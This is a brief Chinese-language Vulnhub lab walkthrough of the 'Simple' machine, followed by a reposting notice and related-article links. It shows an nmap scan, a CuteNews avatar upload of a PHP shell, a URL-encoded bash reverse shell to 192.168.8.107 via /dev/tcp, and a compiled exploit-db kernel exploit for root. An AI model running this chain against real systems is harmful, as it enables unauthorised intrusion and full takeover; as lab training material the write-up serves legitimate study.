目录

[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
千羽星弦2 分钟前
Kubernetes 集群搭建(一):k8s 从环境准备到 Calico 网络插件部署(1.16版本)
网络·容器·kubernetes
微风轻吟挽歌26 分钟前
HTTP 308 错误永久重定向 (Permanent Redirect)
网络·网络协议·http
Double Point1 小时前
(三十七)Dart 中使用 Pub 包管理系统与 HTTP 请求教程
网络·网络协议·http
写代码的小王吧7 小时前
【安全】Web渗透测试(全流程)_渗透测试学习流程图
linux·前端·网络·学习·安全·网络安全·ssh
GalaxyPokemon9 小时前
Muduo网络库实现 [七] - Connection模块
linux·服务器·网络
sniper_fandc10 小时前
网络编程—Socket套接字(TCP)
网络·tcp/ip·javaee
the_nov10 小时前
19.TCP相关实验
linux·服务器·网络·c++·tcp/ip
林中伊人11 小时前
家庭路由器wifi设置LAN2LAN和LAN2WAN
网络·路由器
XYN6111 小时前
【嵌入式学习3】基于python的tcp客户端、服务器
服务器·开发语言·网络·笔记·python·学习·tcp/ip
the_nov11 小时前
20.IP协议
linux·服务器·网络·c++·tcp/ip